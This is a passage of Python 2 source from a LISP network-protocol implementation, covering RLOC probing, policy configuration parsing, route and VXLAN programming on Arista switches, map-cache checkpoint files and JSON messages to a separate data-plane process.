                    rloc.rloc.copy_address(parent_rloc.rloc)

                #
                # Send the RLOC-probe Map-Request.
                #
                seid = None if (group.is_null()) else eid
                deid = eid if (group.is_null()) else group
                lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
                last_rloc = parent_rloc

                #
                # Remove the probe's host route, then restore the saved one.
                #
                if (gw): lisp_install_host_route(addr_str, gw, False)
                if (nh): lisp_install_host_route(addr_str, nh, True)

            #
            # Pace probing: sleep 20 ms after every 10th probe.
            #
            count += 1
            if ((count % 10) == 0): time.sleep(0.020)

    lprint("---------- End RLOC Probing ----------")
    return

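#
# Note on the probe loop above: a probe to an RLOC is suppressed when the
# EID was gleaned (and probing gleaned EIDs is disallowed), when the RLOC
# is admin-down, when the same RLOC was already probed for another EID this
# pass, when an unreachable RLOC was probed less than one probe interval
# ago, or when a recent nonce-echo already proved reachability. Probes are
# rate-paced with a 20-millisecond sleep after every 10th one.
#
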
#
# lisp_update_rtr_updown
#
# ITR only: tell the lisp-etr process that an RTR changed reachability
# state, so the ETR can decide whether to keep registering it.
#
def lisp_update_rtr_updown(rtr, updown):
    global lisp_ipc_socket

    if (lisp_i_am_itr == False): return

    #
    # If configured to register to all RTRs, reachability does not matter.
    #
    if (lisp_register_all_rtrs): return

    rtr_str = rtr.print_address_no_iid()

    #
    # Ignore RTRs we don't know about.
    #
    if (lisp_rtr_list.has_key(rtr_str) == False): return

    updown = "up" if updown else "down"
    lprint("Send ETR IPC message, RTR {} has gone {}".format(
        red(rtr_str, False), bold(updown, False)))

    #
    # Build IPC message for the lisp-etr process.
    #
    ipc = "rtr%{}%{}".format(rtr_str, updown)
    ipc = lisp_command_ipc(ipc, "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
    return

#
# lisp_process_rloc_probe_reply
#
# Process an RLOC-probe Map-Reply for every EID-prefix that uses the probed
# RLOC. 'mrloc' is supplied when the probe was sent to a multicast RLOC.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
    mrloc):
    rloc = rloc_entry.rloc
    nonce = map_reply.nonce
    hop_count = map_reply.hop_count
    probe = bold("RLOC-probe reply", False)
    rloc_addr = rloc.print_address_no_iid()
    source_addr = source.print_address_no_iid()
    probe_list = lisp_rloc_probe_list
    json_str = rloc_entry.json.json_string if rloc_entry.json else None
    ts = lisp_get_timestamp()

    #
    # Multicast case: track per-member replies in the mrloc's own
    # multicast_rloc_probe_list, keyed by the member RLOC address.
    #
    if (mrloc != None):
        mrloc_addr = mrloc.rloc.print_address_no_iid()
        if (mrloc.multicast_rloc_probe_list.has_key(rloc_addr) == False):
            member = copy.deepcopy(mrloc)
            member.rloc.copy_address(rloc)
            member.multicast_rloc_probe_list = {}
            mrloc.multicast_rloc_probe_list[rloc_addr] = member
        member = mrloc.multicast_rloc_probe_list[rloc_addr]
        member.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
        member.last_rloc_probe = mrloc.last_rloc_probe
        r, eid, group = lisp_rloc_probe_list[mrloc_addr][0]
        member.process_rloc_probe_reply(ts, nonce, eid, group, hop_count,
            ttl, json_str)
        mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hop_count,
            ttl, json_str)
        return

    #
    # Find the RLOC in the probe-list; when behind a NAT it may be keyed
    # by address:port, or by the outer source address.
    #
    addr_str = rloc_addr
    if (probe_list.has_key(addr_str) == False):
        addr_str += ":" + str(port)
        if (probe_list.has_key(addr_str) == False):
            addr_str = source_addr
            if (probe_list.has_key(addr_str) == False):
                addr_str += ":" + str(port)
                lprint("    Received unsolicited {} from {}/{}, port {}".
                    format(probe, red(rloc_addr, False), red(source_addr,
                    False), port))
                return

    #
    # Update probe state for each EID-prefix that uses this RLOC. An RTR
    # only accepts the reply on the matching translated port.
    #
    for rloc, eid, group in lisp_rloc_probe_list[addr_str]:
        if (lisp_i_am_rtr):
            if (rloc.translated_port != 0 and rloc.translated_port != port):
                continue
        rloc.process_rloc_probe_reply(ts, nonce, eid, group, hop_count, ttl,
            json_str)
    return

#
# lisp_db_list_length
#
# Count database-mapping entries, including dynamic-EIDs and the extra
# instance-IDs configured per prefix.
#
def lisp_db_list_length():
    count = 0
    for db in lisp_db_list:
        count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
        count += len(db.eid.iid_list)
    return(count)

#
# lisp_is_myeid
#
# Return True if the supplied EID falls inside any database-mapping prefix.
#
def lisp_is_myeid(eid):
    for db in lisp_db_list:
        if (eid.is_more_specific(db.eid)): return(True)
    return(False)

#
# lisp_format_macs
#
# Dash-format two 12-hex-digit MAC address strings for display.
#
def lisp_format_macs(sa, da):
    sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
    da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
    return("{} -> {}".format(sa, da))

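#
# Example (illustrative):
#
#   lisp_format_macs("0050b6aa0001", "0050b6aa0002")
#   returns "0050-b6aa-0001 -> 0050-b6aa-0002"
#
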
#
# lisp_get_echo_nonce
#
# Return the nonce-echo state for an RLOC, if nonce-echoing is enabled.
#
def lisp_get_echo_nonce(rloc, rloc_str):
    if (lisp_nonce_echoing == False): return(None)

    if (rloc): rloc_str = rloc.print_address_no_iid()
    echo_nonce = None
    if (lisp_nonce_echo_list.has_key(rloc_str)):
        echo_nonce = lisp_nonce_echo_list[rloc_str]
    return(echo_nonce)

#
# lisp_decode_dist_name
#
# Remove a null-terminated distinguished-name from the front of a packet
# buffer. Returns [None, None] if the name exceeds 255 bytes.
#
def lisp_decode_dist_name(packet):
    count = 0
    dist_name = ""

    while (packet[0:1] != "\0"):
        if (count == 255): return([None, None])
        dist_name += packet[0:1]
        packet = packet[1::]
        count += 1

    packet = packet[1::]
    return(packet, dist_name)

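#
# Example (illustrative): the name is consumed up to and including its
# null terminator, and the remainder of the buffer is returned:
#
#   lisp_decode_dist_name("ace\0<rest-of-packet>")
#   returns ("<rest-of-packet>", "ace")
#
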
#
# lisp_write_flow_log
#
# Append buffered flow entries to ./logs/lisp-flow.log.
#
def lisp_write_flow_log(flow_log):
    fd = open("./logs/lisp-flow.log", "a")

    count = 0
    for flow in flow_log:
        packet = flow[3]
        flow_str = packet.print_flow(flow[0], flow[1], flow[2])
        fd.write(flow_str)
        count += 1
    fd.close()
    del(flow_log)

    count = bold(str(count), False)
    lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
    return

#
# lisp_policy_command
#
# Process a "lisp policy" command: build one match clause per configured
# datetime-range entry, fill in the match and set parameters, then save
# the policy.
#
def lisp_policy_command(kv_pair):
    policy = lisp_policy("")
    set_iid = None

    match_clauses = []
    for i in range(len(kv_pair["datetime-range"])):
        match_clauses.append(lisp_policy_match())

    for kw in kv_pair.keys():
        value = kv_pair[kw]

        #
        # Store match parameters.
        #
        if (kw == "instance-id"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match = match_clauses[i]
                if (match.source_eid == None):
                    match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                if (match.dest_eid == None):
                    match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                match.source_eid.instance_id = int(v)
                match.dest_eid.instance_id = int(v)
        if (kw == "source-eid"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match = match_clauses[i]
                if (match.source_eid == None):
                    match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                iid = match.source_eid.instance_id
                match.source_eid.store_prefix(v)
                match.source_eid.instance_id = iid
        if (kw == "destination-eid"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match = match_clauses[i]
                if (match.dest_eid == None):
                    match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                iid = match.dest_eid.instance_id
                match.dest_eid.store_prefix(v)
                match.dest_eid.instance_id = iid
        if (kw == "source-rloc"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match = match_clauses[i]
                match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
                match.source_rloc.store_prefix(v)
        if (kw == "destination-rloc"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match = match_clauses[i]
                match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
                match.dest_rloc.store_prefix(v)
        if (kw == "rloc-record-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match_clauses[i].rloc_record_name = v
        if (kw == "geo-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match_clauses[i].geo_name = v
        if (kw == "elp-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match_clauses[i].elp_name = v
        if (kw == "rle-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match_clauses[i].rle_name = v
        if (kw == "json-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                match_clauses[i].json_name = v
        if (kw == "datetime-range"):
            for i in range(len(match_clauses)):
                v = value[i]
                match = match_clauses[i]
                if (v == ""): continue
                lower = lisp_datetime(v[0:19])
                upper = lisp_datetime(v[19::])
                if (lower.valid_datetime() and upper.valid_datetime()):
                    match.datetime_lower = lower
                    match.datetime_upper = upper

        #
        # Store set parameters.
        #
        if (kw == "set-action"):
            policy.set_action = value
        if (kw == "set-record-ttl"):
            policy.set_record_ttl = int(value)
        if (kw == "set-instance-id"):
            if (policy.set_source_eid == None):
                policy.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            if (policy.set_dest_eid == None):
                policy.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            set_iid = int(value)
            policy.set_source_eid.instance_id = set_iid
            policy.set_dest_eid.instance_id = set_iid
        if (kw == "set-source-eid"):
            if (policy.set_source_eid == None):
                policy.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            policy.set_source_eid.store_prefix(value)
            if (set_iid != None): policy.set_source_eid.instance_id = set_iid
        if (kw == "set-destination-eid"):
            if (policy.set_dest_eid == None):
                policy.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            policy.set_dest_eid.store_prefix(value)
            if (set_iid != None): policy.set_dest_eid.instance_id = set_iid
        if (kw == "set-rloc-address"):
            policy.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
            policy.set_rloc_address.store_address(value)
        if (kw == "set-rloc-record-name"):
            policy.set_rloc_record_name = value
        if (kw == "set-elp-name"):
            policy.set_elp_name = value
        if (kw == "set-geo-name"):
            policy.set_geo_name = value
        if (kw == "set-rle-name"):
            policy.set_rle_name = value
        if (kw == "set-json-name"):
            policy.set_json_name = value
        if (kw == "policy-name"):
            policy.policy_name = value

    policy.match_clauses = match_clauses
    policy.save_policy()
    return

lisp_policy_commands = {
    "lisp policy" : [lisp_policy_command, {
        "policy-name" : [True],
        "match" : [],
        "instance-id" : [True, 0, 0xffffffff],
        "source-eid" : [True],
        "destination-eid" : [True],
        "source-rloc" : [True],
        "destination-rloc" : [True],
        "rloc-record-name" : [True],
        "elp-name" : [True],
        "geo-name" : [True],
        "rle-name" : [True],
        "json-name" : [True],
        "datetime-range" : [True],
        "set-action" : [False, "process", "drop"],
        "set-record-ttl" : [True, 0, 0x7fffffff],
        "set-instance-id" : [True, 0, 0xffffffff],
        "set-source-eid" : [True],
        "set-destination-eid" : [True],
        "set-rloc-address" : [True],
        "set-rloc-record-name" : [True],
        "set-elp-name" : [True],
        "set-geo-name" : [True],
        "set-rle-name" : [True],
        "set-json-name" : [True] }]
}

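#
# Note on the table above (inferred from its use here, not stated by the
# source): each clause maps to [value-expected, <min>, <max>] for bounded
# integers, [value-expected, <choice>, ...] for enumerations such as
# "set-action", and plain [value-expected] for free-form strings; "match"
# takes no value at all.
#
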
#
# lisp_send_to_arista
#
# Send a CLI command to Arista hardware via FastCli, optionally in the
# context of an interface. (The heredoc variable is renamed from the
# original so it no longer shadows the 'commands' module.)
#
def lisp_send_to_arista(command, interface):
    interface = "" if (interface == None) else "interface " + interface

    cmd_str = command
    if (interface != ""): cmd_str = interface + ": " + cmd_str
    lprint("Send CLI command '{}' to hardware".format(cmd_str))

    cli_commands = '''
        enable
        configure
        {}
        {}
    '''.format(interface, command)

    os.system("FastCli -c '{}'".format(cli_commands))
    return

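#
# Example (illustrative): lisp_send_to_arista("ip route ...", "Vlan4094")
# runs roughly the following on the switch shell:
#
#   FastCli -c '
#       enable
#       configure
#       interface Vlan4094
#       ip route ...
#   '
#
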
#
# lisp_arista_is_alive
#
# Ask Arista hardware if a prefix is programmed and alive.
#
def lisp_arista_is_alive(prefix):
    cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
    output = commands.getoutput("FastCli -c '{}'".format(cmd))

    #
    # Skip the header line, then take the flags column (last column) of the
    # route line.
    #
    output = output.split("\n")[1]
    flag = output.split(" ")
    flag = flag[-1].replace("\r", "")

    #
    # A trailing "Y" means the route is alive in hardware.
    #
    return(flag == "Y")

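#
# The parse above assumes "sh plat trident l3 software routes <prefix>"
# prints a header line followed by one route line whose last column is a
# Y/N hardware-programmed flag. That output layout is an assumption about
# the Arista CLI; nothing in this file verifies it.
#
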
#
# lisp_program_vxlan_hardware
#
# Program an Arista switch to VXLAN-encapsulate packets for an EID-prefix:
# allocate a free next-hop on vlan4094, point a synthetic MAC at the RLOC's
# VTEP, and install a kernel route to the prefix via that next-hop.
#
def lisp_program_vxlan_hardware(mc):
    #
    # Only do this when running on an Arista box (lispers.net installed in
    # /persist/local).
    #
    if (os.path.exists("/persist/local/lispers.net") == False): return

    #
    # No RLOCs, nothing to program.
    #
    if (len(mc.best_rloc_set) == 0): return

    eid_prefix = mc.eid.print_prefix_no_iid()
    rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()

    #
    # Check if the route is already in hardware.
    #
    route = commands.getoutput("ip route get {} | egrep vlan4094".format(
        eid_prefix))
    if (route != ""):
        lprint("Route {} already in hardware: '{}'".format(
            green(eid_prefix, False), route))
        return

    #
    # A vxlan interface and a vlan4094 interface with an IP address are
    # required for this to work.
    #
    intf = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
    if (intf.find("vxlan") == -1):
        lprint("No VXLAN interface found, cannot program hardware")
        return
    if (intf.find("vlan4094") == -1):
        lprint("No vlan4094 interface found, cannot program hardware")
        return

    ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
    if (ipaddr == ""):
        lprint("No IP address found on vlan4094, cannot program hardware")
        return
    ipaddr = ipaddr.split("inet ")[1]
    ipaddr = ipaddr.split("/")[0]

    #
    # Collect ARP entries on vlan4094 so we can pick an unused next-hop
    # address on that subnet.
    #
    arp_entries = []
    lines = commands.getoutput("arp -i vlan4094").split("\n")
    for line in lines:
        if (line.find("vlan4094") == -1): continue
        if (line.find("(incomplete)") == -1): continue
        nh = line.split(" ")[0]
        arp_entries.append(nh)

    nh = None
    local_addr = ipaddr
    ipaddr = ipaddr.split(".")
    for i in range(1, 255):
        ipaddr[3] = str(i)
        addr = ".".join(ipaddr)
        if (addr in arp_entries): continue
        if (addr == local_addr): continue
        nh = addr
        break

    if (nh == None):
        lprint("Address allocation failed for vlan4094, cannot program " +
            "hardware")
        return

    #
    # Derive a MAC address from the low 3 octets of the RLOC and install a
    # static ARP entry for the allocated next-hop.
    #
    octets = rloc.split(".")
    b1 = lisp_hex_string(octets[1]).zfill(2)
    b2 = lisp_hex_string(octets[2]).zfill(2)
    b3 = lisp_hex_string(octets[3]).zfill(2)
    mac = "00:00:00:{}:{}:{}".format(b1, b2, b3)
    arista_mac = "0000.00{}.{}{}".format(b1, b2, b3)
    arp_cmd = "arp -i vlan4094 -s {} {}".format(nh, mac)
    os.system(arp_cmd)

    #
    # Point the MAC at the RLOC's VTEP.
    #
    mac_cmd = ("mac address-table static {} vlan 4094 " +
        "interface vxlan 1 vtep {}").format(arista_mac, rloc)
    lisp_send_to_arista(mac_cmd, None)

    #
    # Install the kernel route to the EID-prefix via the allocated next-hop.
    #
    route_cmd = "ip route add {} via {}".format(eid_prefix, nh)
    os.system(route_cmd)

    lprint("Hardware programmed with commands:")
    route_cmd = route_cmd.replace(eid_prefix, green(eid_prefix, False))
    lprint("  " + route_cmd)
    lprint("  " + arp_cmd)
    mac_cmd = mac_cmd.replace(rloc, red(rloc, False))
    lprint("  " + mac_cmd)
    return

#
# lisp_clear_hardware_walk
#
# Remove the kernel route for one map-cache entry.
#
def lisp_clear_hardware_walk(mc, parms):
    prefix = mc.eid.print_prefix_no_iid()
    os.system("ip route delete {}".format(prefix))
    return([True, None])

#
# lisp_clear_map_cache
#
# User cleared the map-cache: reset the cache and all state derived from
# it, then tell the external data-plane to restart.
#
def lisp_clear_map_cache():
    global lisp_map_cache, lisp_rloc_probe_list
    global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
    global lisp_rtr_list, lisp_gleaned_groups
    global lisp_no_map_request_rate_limit

    cleared = bold("User cleared", False)
    count = lisp_map_cache.cache_count
    lprint("{} map-cache with {} entries".format(cleared, count))

    if (lisp_program_hardware):
        lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
    lisp_map_cache = lisp_cache()

    #
    # Restart the Map-Request rate-limit window.
    #
    lisp_no_map_request_rate_limit = lisp_get_timestamp()

    #
    # Clear the RLOC-probe list.
    #
    lisp_rloc_probe_list = {}

    #
    # Clear per-RLOC crypto keys.
    #
    lisp_crypto_keys_by_rloc_encap = {}
    lisp_crypto_keys_by_rloc_decap = {}

    #
    # Clear the RTR list.
    #
    lisp_rtr_list = {}

    #
    # Clear gleaned groups.
    #
    lisp_gleaned_groups = {}

    #
    # Tell the external data-plane.
    #
    lisp_process_data_plane_restart(True)
    return

#
# lisp_encapsulate_rloc_probe
#
# Data-encapsulate an RLOC-probe so it can traverse a NAT: prepend an
# IPv4/UDP header addressed to the RLOC and send it on the raw socket.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
    if (len(lisp_sockets) != 4): return

    local_addr = lisp_myrlocs[0]

    #
    # Build the inner IPv4 header (20 bytes) and UDP header (8 bytes).
    #
    length = len(packet) + 28
    ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
        17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
    ip = lisp_ip_checksum(ip)

    udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
        socket.htons(length - 20), 0)

    #
    # Build the LISP packet and fill in its addresses.
    #
    packet = lisp_packet(ip + udp + packet)

    packet.inner_dest.copy_address(rloc)
    packet.inner_dest.instance_id = 0xffffff
    packet.inner_source.copy_address(local_addr)
    packet.inner_ttl = 64
    packet.outer_dest.copy_address(rloc)
    packet.outer_source.copy_address(local_addr)
    packet.outer_version = packet.outer_dest.afi_to_version()
    packet.outer_ttl = 64
    packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT

    rloc_str = red(rloc.print_address_no_iid(), False)
    if (nat_info):
        hostname = " {}".format(blue(nat_info.hostname, False))
        probe = bold("RLOC-probe request", False)
    else:
        hostname = ""
        probe = bold("RLOC-probe reply", False)

    lprint(("Data encapsulate {} to {}{} port {} for " +
        "NAT-traversal").format(probe, rloc_str, hostname,
        packet.encap_port))

    #
    # Encode the data-encapsulation header and send.
    #
    if (packet.encode(None) == None): return
    packet.print_packet("Send", True)

    raw_socket = lisp_sockets[3]
    packet.send_packet(raw_socket, packet.outer_dest)
    del(packet)
    return

#
# lisp_get_default_route_next_hops
#
# Return the default route's next-hops as a list of [device, gateway]
# pairs.
#
def lisp_get_default_route_next_hops():
    #
    # macOS formats "route -n get default" as "key: value" lines.
    #
    if (lisp_is_macos()):
        cmd = "route -n get default"
        lines = commands.getoutput(cmd).split("\n")
        gw = intf = None
        for line in lines:
            if (line.find("gateway: ") != -1): gw = line.split(": ")[1]
            if (line.find("interface: ") != -1): intf = line.split(": ")[1]
        return([[intf, gw]])

    #
    # Linux: parse "ip route" default entries, skipping metric routes.
    #
    cmd = "ip route | egrep 'default via'"
    default_routes = commands.getoutput(cmd).split("\n")

    next_hops = []
    for route in default_routes:
        if (route.find(" metric ") != -1): continue
        r = route.split(" ")
        try:
            gw_index = r.index("via") + 1
            if (gw_index >= len(r)): continue
            device_index = r.index("dev") + 1
            if (device_index >= len(r)): continue
        except:
            continue

        next_hops.append([r[device_index], r[gw_index]])
    return(next_hops)

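#
# Example (illustrative): on Linux a default route line such as
#
#   default via 192.168.1.1 dev eth0 proto dhcp
#
# parses to ["eth0", "192.168.1.1"]; lines carrying " metric " are skipped
# so only the preferred default routes are considered.
#
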
#
# lisp_get_host_route_next_hop
#
# Return the next-hop of an installed host route for an RLOC, or None.
#
def lisp_get_host_route_next_hop(rloc):
    cmd = "ip route | egrep '{} via'".format(rloc)
    route = commands.getoutput(cmd).split(" ")

    try: index = route.index("via") + 1
    except: return(None)

    if (index >= len(route)): return(None)
    return(route[index])

#
# lisp_install_host_route
#
# Install or remove a /32 host route, optionally via a next-hop.
#
def lisp_install_host_route(dest, nh, install):
    install = "add" if install else "delete"
    nh_str = "none" if nh == None else nh

    lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))

    if (nh == None):
        cmd = "ip route {} {}/32".format(install, dest)
    else:
        cmd = "ip route {} {}/32 via {}".format(install, dest, nh)
    os.system(cmd)
    return

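#
# Example (illustrative): the function shells out to iproute2, so
#
#   lisp_install_host_route("10.0.0.1", "192.168.1.1", True)
#     runs "ip route add 10.0.0.1/32 via 192.168.1.1"
#   lisp_install_host_route("10.0.0.1", None, False)
#     runs "ip route delete 10.0.0.1/32"
#
# Running these requires root (or CAP_NET_ADMIN); os.system() return codes
# are not checked.
#
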
#
# lisp_checkpoint
#
# Write the map-cache checkpoint file, one line per entry.
#
def lisp_checkpoint(checkpoint_list):
    if (lisp_checkpoint_map_cache == False): return

    fd = open(lisp_checkpoint_filename, "w")
    for entry in checkpoint_list:
        fd.write(entry + "\n")
    fd.close()
    lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
        len(checkpoint_list), lisp_checkpoint_filename))
    return

#
# lisp_load_checkpoint
#
# Rebuild the map-cache from the checkpoint file written by
# lisp_checkpoint(), marking each entry as a checkpoint entry.
#
def lisp_load_checkpoint():
    if (lisp_checkpoint_map_cache == False): return
    if (os.path.exists(lisp_checkpoint_filename) == False): return

    fd = open(lisp_checkpoint_filename, "r")

    count = 0
    for entry in fd:
        count += 1
        eid = entry.split(" rloc ")
        rlocs = [] if (eid[1] in ["native-forward\n", "\n"]) else \
            eid[1].split(", ")

        rloc_set = []
        for rloc in rlocs:
            rloc_entry = lisp_rloc(False)
            r = rloc.split(" ")
            rloc_entry.rloc.store_address(r[0])
            rloc_entry.priority = int(r[1])
            rloc_entry.weight = int(r[2])
            rloc_set.append(rloc_entry)

        mc = lisp_mapping("", "", rloc_set)
        if (mc != None):
            mc.eid.store_prefix(eid[0])
            mc.checkpoint_entry = True
            mc.map_cache_ttl = LISP_NMR_TTL * 60
            if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
            mc.add_cache()
            continue

        count -= 1

    fd.close()
    lprint("{} {} map-cache entries from file '{}'".format(
        bold("Loaded", False), count, lisp_checkpoint_filename))
    return

#
# lisp_write_checkpoint_entry
#
# Format one map-cache entry as a checkpoint line and append it to the
# caller's list.
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
    if (lisp_checkpoint_map_cache == False): return

    entry = "{} rloc ".format(mc.eid.print_prefix())

    for rloc_entry in mc.rloc_set:
        if (rloc_entry.rloc.is_null()): continue
        entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
            rloc_entry.priority, rloc_entry.weight)

    if (mc.rloc_set != []):
        entry = entry[0:-2]
    elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
        entry += "native-forward"

    checkpoint_list.append(entry)
    return

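#
# Example (illustrative): checkpoint lines written above and read back by
# lisp_load_checkpoint() look like:
#
#   [1000]10.1.0.0/16 rloc 192.168.1.2 1 50, 192.168.2.2 1 50
#   [1000]10.2.0.0/16 rloc native-forward
#
# where each RLOC is "<address> <priority> <weight>" (the bracketed
# instance-ID prefix is how print_prefix() renders EIDs).
#
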
#
# lisp_check_dp_socket
#
# Return True if the external data-plane's named socket exists.
#
def lisp_check_dp_socket():
    socket_name = lisp_ipc_dp_socket_name
    if (os.path.exists(socket_name) == False):
        dne = bold("does not exist", False)
        lprint("Socket '{}' {}".format(socket_name, dne))
        return(False)
    return(True)

#
# lisp_write_to_dp_socket
#
# JSON-encode a record and send it to the external data-plane's named
# socket.
#
def lisp_write_to_dp_socket(entry):
    try:
        rec = json.dumps(entry)
        write = bold("Write IPC", False)
        lprint("{} record to named socket: '{}'".format(write, rec))
        lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
    except:
        lprint("Failed to write IPC record to named socket: '{}'".format(
            rec))
    return

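
#
# lisp_write_ipc_keys
#
# After a key change for an RLOC, push every map-cache entry that refers to
# that RLOC (found via the RLOC-probe list) down to the data-plane.
#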
def lisp_write_ipc_keys(rloc):
    addr_str = rloc.rloc.print_address_no_iid()
    port = rloc.translated_port
    if (port != 0): addr_str += ":" + str(port)
    if (lisp_rloc_probe_list.has_key(addr_str) == False): return

    for r, eid, group in lisp_rloc_probe_list[addr_str]:
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc == None): continue
        lisp_write_ipc_map_cache(True, mc)
    return
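
#
# lisp_write_ipc_map_cache
#
# Build a JSON "map-cache" add/delete record for a map-cache entry (an RLOC
# set for unicast entries, an RLE set for multicast entries) and, unless
# dont_send is set, write it to the data-plane socket. Returns the record.
#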
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    opcode = "add" if add_or_delete else "delete"
    entry = {"type": "map-cache", "opcode": opcode}

    multicast = (mc.group.is_null() == False)
    if (multicast):
        entry["eid-prefix"] = mc.group.print_prefix_no_iid()
        entry["rles"] = []
    else:
        entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
        entry["rlocs"] = []
    entry["instance-id"] = str(mc.eid.instance_id)

    if (multicast):
        if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
            for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
                address = rle_node.address.print_address_no_iid()
                port = str(4341) if rle_node.translated_port == 0 else \
                    str(rle_node.translated_port)
                record = {"rle": address, "port": port}
                ekey, ikey = rle_node.get_encap_keys()
                record = lisp_build_json_keys(record, ekey, ikey,
                    "encrypt-key")
                entry["rles"].append(record)
    else:
        for rloc in mc.rloc_set:
            if (rloc.rloc.is_ipv4() == False and
                rloc.rloc.is_ipv6() == False): continue
            if (rloc.up_state() == False): continue

            port = str(4341) if rloc.translated_port == 0 else \
                str(rloc.translated_port)
            record = {"rloc": rloc.rloc.print_address_no_iid(),
                "priority": str(rloc.priority),
                "weight": str(rloc.weight), "port": port}
            ekey, ikey = rloc.get_encap_keys()
            record = lisp_build_json_keys(record, ekey, ikey, "encrypt-key")
            entry["rlocs"].append(record)

    if (dont_send == False): lisp_write_to_dp_socket(entry)
    return (entry)
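
#
# lisp_write_ipc_decap_key
#
# Send a "decap-keys" record with the decryption and ICV keys for an RLOC
# (optionally including a port) to the data-plane. ITRs do not decapsulate,
# so they skip this.
#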
def lisp_write_ipc_decap_key(rloc_addr, keys):
    if (lisp_i_am_itr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    if (keys == None or len(keys) == 0 or keys[1] == None): return

    ekey = keys[1].encrypt_key
    ikey = keys[1].icv_key

    rloc_and_port = rloc_addr.split(":")
    if (len(rloc_and_port) == 1):
        entry = {"type": "decap-keys", "rloc": rloc_and_port[0]}
    else:
        entry = {"type": "decap-keys", "rloc": rloc_and_port[0],
            "port": rloc_and_port[1]}

    entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
    lisp_write_to_dp_socket(entry)
    return
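
#
# lisp_build_json_keys
#
# Add a "keys" array (key-id 1 with the cipher key and ICV key) to a JSON
# IPC record. key_type is either "encrypt-key" or "decrypt-key".
#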
def lisp_build_json_keys(entry, ekey, ikey, key_type):
    if (ekey == None): return (entry)

    entry["keys"] = []
    key = {"key-id": "1", key_type: ekey, "icv-key": ikey}
    entry["keys"].append(key)
    return (entry)
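
#
# lisp_write_ipc_database_mappings
#
# Write the IPv4/IPv6 database-mapping EID-prefixes, followed by the ETR's
# ephemeral NAT port, to the data-plane socket. Only ETRs do this.
#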
def lisp_write_ipc_database_mappings(ephem_port):
    if (lisp_i_am_etr == False): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    entry = {"type": "database-mappings", "database-mappings": []}

    for db in lisp_db_list:
        if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False):
            continue
        record = {"instance-id": str(db.eid.instance_id),
            "eid-prefix": db.eid.print_prefix_no_iid()}
        entry["database-mappings"].append(record)
    lisp_write_to_dp_socket(entry)

    entry = {"type": "etr-nat-port", "port": ephem_port}
    lisp_write_to_dp_socket(entry)
    return
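
#
# lisp_write_ipc_interfaces
#
# Write the list of configured interfaces and their instance-IDs to the
# data-plane socket.
#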
def lisp_write_ipc_interfaces():
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    entry = {"type": "interfaces", "interfaces": []}

    for interface in lisp_myinterfaces.values():
        if (interface.instance_id == None): continue
        record = {"interface": interface.device,
            "instance-id": str(interface.instance_id)}
        entry["interfaces"].append(record)

    lisp_write_to_dp_socket(entry)
    return
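
#
# lisp_parse_auth_key
#
# Parse an authentication-key configuration value of the form
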